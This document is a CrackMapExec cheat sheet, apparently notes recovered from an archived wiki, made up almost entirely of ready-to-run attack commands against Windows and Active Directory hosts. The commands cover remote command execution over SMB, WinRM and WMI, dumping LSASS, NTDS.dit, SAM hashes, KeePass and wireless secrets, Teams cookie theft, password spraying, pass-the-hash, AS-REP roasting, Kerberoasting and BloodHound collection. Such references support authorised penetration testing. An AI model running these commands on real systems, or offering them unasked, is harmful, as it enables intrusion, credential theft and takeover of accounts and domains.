CrackMapExec notes
A lot of this was pulled from the Wayback Machine archive of what used to be crackmapexec.wiki, but the original site seems to be down now. This should be a comprehensive list of general commands that can be used with CrackMapExec.
Basic command execution stuff
Note: these two commands omit the protocol argument (smb, winrm, wmi, ...) that crackmapexec normally requires; -x runs a cmd.exe command and -X runs a PowerShell command.
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
SMB
Credential dumping
Note that for most of these you need local admin, just like with Mimikatz.
LSASS
cme smb 192.168.255.131 -u administrator -p pass -M lsassy
cme smb 192.168.255.131 -u administrator -p pass -M nanodump
Wireless
cme smb <ip> -u user -p pass -M wireless
KeePass
crackmapexec smb <ip> -u user -p pass -M keepass_discover
crackmapexec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
NTDS.dit
cme smb 192.168.1.100 -u USERNAME -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u USERNAME -p 'PASSWORDHERE' --ntds --users
cme smb 192.168.1.100 -u USERNAME -p 'PASSWORDHERE' --ntds --users --enabled
cme smb 192.168.1.100 -u USERNAME -p 'PASSWORDHERE' --ntds vss
Note: you can also get NTDS.dit by DCSync'ing with the DC machine account.
SAM hashes
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --sam
MS Teams cookie theft (needs local admin)
crackmapexec smb <ip> -u user -p pass -M teams_localdb
SMB password sprays
cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
cme smb 192.168.1.101 -u user1 -p password1 password2 password3
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
Local authentication examples
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --local-auth
cme smb 192.168.1.0/24 -u '' -p '' --local-auth
cme smb 192.168.1.0/24 -u USERNAME -H 'LM:NT' --local-auth
cme smb 192.168.1.0/24 -u USERNAME -H 'NTHASH' --local-auth
cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
LDAP
Test account existence via LDAP with an empty password (note that -k here means Kerberos authentication)
cme ldap 192.168.1.0/24 -u users.txt -p '' -k
Test creds
cme ldap 192.168.1.0/24 -u user -p password
With an NT hash
cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
AS-REP Roast
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
Domain SID Discovery
crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
Kerberoast
cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
Bloodhound ingestion
crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All
WinRM
Password spray
cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Test creds
cme winrm 192.168.1.0/24 -u user -p password
If SMB is closed, pass the domain explicitly with -d
cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN
Command execution
cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WMI
Password spray
cme wmi 192.168.1.0/24 -u userfile -p passwordfile
cme wmi 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Test creds
cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
Test creds if SMB is closed (pass the domain explicitly with -d)
cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d <domain>
Local auth
cme wmi 10.10.10.52 -u admin -p 'admin' --local-auth
WMI command execution
crackmapexec wmi 192.168.255.131 -u user -p 'password' -x whoami